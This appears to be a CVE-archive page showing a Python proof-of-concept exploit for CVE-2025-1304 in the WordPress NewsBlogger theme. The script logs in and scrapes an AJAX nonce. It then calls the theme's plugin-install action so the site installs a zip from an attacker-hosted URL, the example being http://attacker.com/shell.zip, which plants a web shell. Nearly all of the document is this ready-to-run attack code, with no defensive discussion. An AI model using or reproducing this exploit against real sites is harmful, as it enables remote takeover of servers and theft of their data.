4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-1304
README.md
Rendering markdown...
POC / CVE-2025-1304.py PY
⬇ Raw GitHub ✕ Close 
import requests
import re
import argparse

# By : Nxploited (Khaled Alenazi)

# Argument parser for user inputs
parser = argparse.ArgumentParser(description="WordPress NewsBlogger Theme Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)")
parser.add_argument('--url', '-u', required=True, help='Target base URL (e.g., http://localhost/wordpress)')
parser.add_argument('--username', '-un', required=True, help='WordPress admin username')
parser.add_argument('--password', '-p', required=True, help='WordPress admin password')
parser.add_argument('--shellweb', '-shell', required=True, help='Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)')
args = parser.parse_args()

# Setup session
session = requests.Session()
session.verify = False  # Disable SSL verification
requests.packages.urllib3.disable_warnings()
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

# Login
login_url = f"{args.url}/wp-login.php"
print(f"[+] Logging in to {login_url}")
response = session.post(login_url, data={
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}, headers={"User-Agent": user_agent})

if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully.")
else:
    print("[-] Failed to log in.")
    exit()

# Extract nonce
welcome_url = f"{args.url}/wp-admin/admin.php?page=newsblogger-welcome"
print(f"[+] Fetching welcome page to extract nonce: {welcome_url}")
welcome_resp = session.get(welcome_url)

nonce_patterns = [
    r'pluginInstallerAjax\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]+)"',
    r'"nonce"\s*:\s*"([a-zA-Z0-9]+)"',
    r'nonce\s*=\s*"([a-zA-Z0-9]+)"',
    r'nonce":"([a-zA-Z0-9]+)"'
]

nonce = next((re.search(pattern, welcome_resp.text).group(1) for pattern in nonce_patterns if re.search(pattern, welcome_resp.text)), None)

if not nonce:
    print("[-] Failed to extract nonce. Try visiting the welcome page and inspect manually.")
    exit()

print(f"[+] Extracted nonce: {nonce}")

# Execute exploit
ajax_url = f"{args.url}/wp-admin/admin-ajax.php"
payload = {
    'action': 'newsblogger_install_activate_plugin',
    'plugin_url': args.shellweb,
    'plugin_slug': 'spice-starter-sites',
    '_ajax_nonce': nonce
}
print(f"[+] Sending malicious plugin URL to: {ajax_url}")
exploit_resp = session.post(ajax_url, headers={
    "User-Agent": user_agent,
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": welcome_url
}, data=payload)

print("[+] Server response:")
print(exploit_resp.text)

if "Plugin activated" in exploit_resp.text or "success" in exploit_resp.text.lower():
    print("\nExploit executed successfully.")
else:
    print("[-] Exploit may have failed or response needs manual review.")